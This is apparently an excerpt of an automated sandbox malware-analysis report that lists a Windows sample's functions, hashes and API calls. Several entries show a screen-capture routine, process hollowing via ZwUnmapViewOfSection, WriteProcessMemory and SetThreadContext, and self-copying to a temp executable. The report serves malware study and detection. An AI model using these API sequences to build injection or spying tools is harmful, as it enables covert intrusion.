                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 63c6752c91fa09a59911cbec739b695d928ea4d41f79e3f210d04f564ca51bf4
                                        • Instruction ID: 9583adf114605d02d5e2e19679ce9bf42d3b47f395d82ba1fcfe18c7509b5e77
                                        • Opcode Fuzzy Hash: 63c6752c91fa09a59911cbec739b695d928ea4d41f79e3f210d04f564ca51bf4
                                        • Instruction Fuzzy Hash: 59028E717046518FD318CF2EE880536B7E1AF8E301B46867EE586C7391EB34E922CB95
                                        Function 00426264 Relevance: .4, Instructions: 377COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5fde6092dbaeb595df6386206e95cc36bec498aab372ae6033ef90cb0bf67f56
                                        • Instruction ID: 08c65c0034c77f162a5e2f762c8ff88aaa906a6fc17fd64b80a7c511c0c0ca56
                                        • Opcode Fuzzy Hash: 5fde6092dbaeb595df6386206e95cc36bec498aab372ae6033ef90cb0bf67f56
                                        • Instruction Fuzzy Hash: A3F14B716142548FC314DF1DE89187B73E0BB8A301B460A2EF5C2D7392DB78EA1ADB56
                                        Function 00431387 Relevance: .4, Instructions: 371COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 60a407b7035b458234a1b4ae8876206eb8531d1806f2b32c6b298a9738e91288
                                        • Instruction ID: 6072d2ab819a24c58290f472cacd0ace346509952e007a1e49c4d5c76d6a9cd3
                                        • Opcode Fuzzy Hash: 60a407b7035b458234a1b4ae8876206eb8531d1806f2b32c6b298a9738e91288
                                        • Instruction Fuzzy Hash: 90D1BF71A083558BC724DE29C88096FB7E4FF88354F442A2EF89597320EB38DD05CB86
                                        Function 0041D081 Relevance: .3, Instructions: 276COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e7326b31f45d4e50c8c50174bee11f9882207dfed74e31d12f4697374e1987de
                                        • Instruction ID: b3ed2c0ab3c8a1cf02cd55a458d72155988f8fbc7d55d27d708debdf014431d3
                                        • Opcode Fuzzy Hash: e7326b31f45d4e50c8c50174bee11f9882207dfed74e31d12f4697374e1987de
                                        • Instruction Fuzzy Hash: AEB1A17951429A8ACB01EF68C4913F63BA1EF6A300F4850B9EC9CCF757D3398506EB24
                                        Function 00436A9D Relevance: .3, Instructions: 254COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                        • Instruction ID: 74e2ef470e0f7eaec2bbcc97644f24ba1b58e581bc817aa34aafa8545d81d3a7
                                        • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                        • Instruction Fuzzy Hash: D791A8722080A319D72D423E847403FFFE19A563A1B1BA79FD4F2CB2C5EE18D565DA24
                                        Function 00436D58 Relevance: .2, Instructions: 244COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                        • Instruction ID: 8d8b5119396e2834e670033089963a3e86919695436a47c170bc2bcb8e078ffc
                                        • Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                        • Instruction Fuzzy Hash: A691A7762080E35DDB294639843403FFFE15A563A1B1B67AFE4F2CB2C5EE18C568D624
                                        Function 004367D6 Relevance: .2, Instructions: 240COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                        • Instruction ID: eaa300f4f162f1acbdde4decff541324e593f013a6a572b7afaac19ec25842a6
                                        • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                        • Instruction Fuzzy Hash: F99195722090A319DB2D4239843403FFFE15E5A3A1B1BA79FD4F2CB2C5EE28C564D624
                                        Function 0043D0A8 Relevance: .2, Instructions: 237COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dcaaf3a538fb6447e3283ddd15f45a67438a23807e0f4513107e056d33e47a72
                                        • Instruction ID: 9b9e3495b2600b5bb57a0f881f66ff577775c96cdfa749367535f2d08535ee8a
                                        • Opcode Fuzzy Hash: dcaaf3a538fb6447e3283ddd15f45a67438a23807e0f4513107e056d33e47a72
                                        • Instruction Fuzzy Hash: A3615871E0060867DE386928BC56BBF63A9EB4D304F14395BE883DB381C65DDD42835E
                                        Function 0043652C Relevance: .2, Instructions: 232COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                        • Instruction ID: 82e4230dd5615ab793e8164ae3cdd09518d68db03ee48e672ae2bd39712f48c3
                                        • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                        • Instruction Fuzzy Hash: FF81EA722080A31DDB2D4239853803FFFE15A563A5B1BA7AFD4F2CB2C5EE18C564D624
                                        Function 0043C9ED Relevance: .2, Instructions: 214COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                                        • Instruction ID: 1ecc17c6f396bdcf1bd7e257d91ac660bf1aa2674e3e23ad4d3769e79eae6022
                                        • Opcode Fuzzy Hash: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                                        • Instruction Fuzzy Hash: 9751647160460D4BDB34EA6895E77BFA3899B0E344F18350BE582F7782C61DAD02939E
                                        Function 00426FBD Relevance: .2, Instructions: 186COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: aab2813c665c480545fef87c0c14cb93031e59ded8cfa1b4e39f94410d0708d9
                                        • Instruction ID: 630ecb88457be3648657eb57e3c78cf78304789516621443522bf01dd35d6fbf
                                        • Opcode Fuzzy Hash: aab2813c665c480545fef87c0c14cb93031e59ded8cfa1b4e39f94410d0708d9
                                        • Instruction Fuzzy Hash: 81616F32A083159FC308DF75E581A5BB7E5BFCC718F450E1EF489DA151E634EA088B86
                                        Function 00417FAF Relevance: 52.8, APIs: 29, Strings: 1, Instructions: 324windowmemoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00417FC9
                                        • CreateCompatibleDC.GDI32(00000000), ref: 00417FD4
                                          • Part of subcall function 00418462: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00418492
                                        • CreateCompatibleBitmap.GDI32(?,00000000), ref: 00418055
                                        • DeleteDC.GDI32(?), ref: 0041806D
                                        • DeleteDC.GDI32(00000000), ref: 00418070
                                        • SelectObject.GDI32(00000000,00000000), ref: 0041807B
                                        • StretchBlt.GDI32(00000000,00000000,00000000,00000000,?,?,?,?,00000000,?,00CC0020), ref: 004180A3
                                        • GetCursorInfo.USER32(?), ref: 004180C5
                                        • GetIconInfo.USER32(?,?), ref: 004180DB
                                        • DeleteObject.GDI32(?), ref: 0041810A
                                        • DeleteObject.GDI32(?), ref: 00418117
                                        • DrawIcon.USER32(00000000,?,?,?), ref: 00418124
                                        • BitBlt.GDI32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00660046), ref: 00418154
                                        • GetObjectA.GDI32(?,00000018,?), ref: 00418183
                                        • LocalAlloc.KERNEL32(00000040,00000028), ref: 004181CC
                                        • LocalAlloc.KERNEL32(00000040,00000001), ref: 004181EF
                                        • GlobalAlloc.KERNEL32(00000000,?), ref: 00418258
                                        • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041827B
                                        • DeleteDC.GDI32(?), ref: 0041828F
                                        • DeleteDC.GDI32(00000000), ref: 00418292
                                        • DeleteObject.GDI32(00000000), ref: 00418295
                                        • GlobalFree.KERNEL32(00CC0020), ref: 004182A0
                                        • DeleteObject.GDI32(00000000), ref: 00418354
                                        • GlobalFree.KERNEL32(?), ref: 0041835B
                                        • DeleteDC.GDI32(?), ref: 0041836B
                                        • DeleteDC.GDI32(00000000), ref: 00418376
                                        • DeleteDC.GDI32(?), ref: 004183A8
                                        • DeleteDC.GDI32(00000000), ref: 004183AB
                                        • DeleteObject.GDI32(?), ref: 004183B1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Delete$Object$AllocCreateGlobal$CompatibleFreeIconInfoLocal$BitmapBitsCursorDisplayDrawEnumSelectSettingsStretch
                                        • String ID: DISPLAY
                                        • API String ID: 1352755160-865373369
                                        • Opcode ID: 4332875b330b260fe317f73885a67b787bcc9eef3312130aa5211c7270dddff5
                                        • Instruction ID: 6b2ada92df8522405a2cca839f58df11a8e30ba3d3d74bda048dad66fb1953bf
                                        • Opcode Fuzzy Hash: 4332875b330b260fe317f73885a67b787bcc9eef3312130aa5211c7270dddff5
                                        • Instruction Fuzzy Hash: 39C17C71508344AFD3209F25DC44BABBBE9FF88751F04092EF989932A1DB34E945CB5A
                                        Function 00417245 Relevance: 49.3, APIs: 22, Strings: 6, Instructions: 290libraryloaderthreadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 0041728C
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041728F
                                        • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 004172A0
                                        • GetProcAddress.KERNEL32(00000000), ref: 004172A3
                                        • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 004172B4
                                        • GetProcAddress.KERNEL32(00000000), ref: 004172B7
                                        • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004172C8
                                        • GetProcAddress.KERNEL32(00000000), ref: 004172CB
                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0041736C
                                        • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00417384
                                        • GetThreadContext.KERNEL32(?,00000000), ref: 0041739A
                                        • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004173C0
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00417440
                                        • TerminateProcess.KERNEL32(?,00000000), ref: 00417454
                                        • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041748B
                                        • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00417558
                                        • SetThreadContext.KERNEL32(?,00000000), ref: 00417575
                                        • ResumeThread.KERNEL32(?), ref: 00417582
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041759A
                                        • GetCurrentProcess.KERNEL32(?), ref: 004175A5
                                        • TerminateProcess.KERNEL32(?,00000000), ref: 004175BF
                                        • GetLastError.KERNEL32 ref: 004175C7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                        • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$`Wu$ntdll
                                        • API String ID: 4188446516-529412701
                                        • Opcode ID: 0508007fc5a19f335f37bc9d6881170284180ec94406780ecb3836aa2a2a6048
                                        • Instruction ID: 2a1bc7bdc729258c18c32f0bb95ec7660c06bfb5025054df3919bc75ccc59624
                                        • Opcode Fuzzy Hash: 0508007fc5a19f335f37bc9d6881170284180ec94406780ecb3836aa2a2a6048
                                        • Instruction Fuzzy Hash: DFA17CB1508304AFD7209F65DC45B6B7BF9FF48345F00082AF689C2661E779E984CB6A
                                        Function 004112B5 Relevance: 43.9, APIs: 17, Strings: 8, Instructions: 189synchronizationsleepfileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateMutexA.KERNEL32(00000000,00000001,00000000,004742F8,?,00000000), ref: 004112D4
                                        • ExitProcess.KERNEL32 ref: 0041151D
                                          • Part of subcall function 0041265D: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                          • Part of subcall function 0041265D: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                          • Part of subcall function 0041265D: RegCloseKey.KERNEL32(00000000), ref: 0041269D
                                          • Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B643
                                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,00000000), ref: 0041135B
                                        • OpenProcess.KERNEL32(00100000,00000000,T@,?,?,?,?,00000000), ref: 0041136A
                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 00411375
                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 0041137C
                                        • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 00411382
                                          • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                          • Part of subcall function 004127D5: RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                          • Part of subcall function 004127D5: RegCloseKey.KERNEL32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                        • PathFileExistsW.SHLWAPI(?,?,?,?,?,00000000), ref: 004113B3
                                        • GetTempPathW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000000), ref: 0041140F
                                        • GetTempFileNameW.KERNEL32(?,temp_,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00411429
                                        • lstrcatW.KERNEL32(?,.exe,?,?,?,?,?,?,?,00000000), ref: 0041143B
                                          • Part of subcall function 0041B59F: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,0040A009,?,00000000,00000000), ref: 0041B5FB
                                          • Part of subcall function 0041B59F: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040A009,?,00000000,00000000), ref: 0041B60F
                                          • Part of subcall function 0041B59F: CloseHandle.KERNEL32(00000000,?,0040A009,?,00000000,00000000), ref: 0041B61C
                                        • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00411483
                                        • Sleep.KERNEL32(000001F4,?,?,?,?,00000000), ref: 004114C4
                                        • OpenProcess.KERNEL32(00100000,00000000,?,?,?,?,?,00000000), ref: 004114D9
                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 004114E4
                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 004114EB
                                        • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 004114F1
                                          • Part of subcall function 0041B59F: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0041B6B5,00000000,00000000,?), ref: 0041B5DE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$CloseCreateProcess$HandleOpen$CurrentObjectPathSingleTempValueWait$ExecuteExistsExitMutexNamePointerQueryShellSleepWritelstrcat
                                        • String ID: .exe$0DG$@CG$T@$WDH$exepath$open$temp_
                                        • API String ID: 4250697656-2665858469
                                        • Opcode ID: 5dbcded7602185ea070b480d70fb33acaad7b421ae312c9c840d883bd3e5244d
                                        • Instruction ID: e3cce03e36166c77d6950284f165d3805ee2b23d785f43ba83868d4dcf2b0e5d
                                        • Opcode Fuzzy Hash: 5dbcded7602185ea070b480d70fb33acaad7b421ae312c9c840d883bd3e5244d
                                        • Instruction Fuzzy Hash: 1651B671A043156BDB00A7A0AC49EFE736D9B44715F1041BBF905A72D2EF7C8E828A9D
                                        Function 0040C28E Relevance: 42.3, APIs: 6, Strings: 18, Instructions: 282registryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                          • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040C38B
                                        • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C39E
                                        • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040C3B7
                                        • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040C3E7
                                          • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(Function_000099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                                          • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
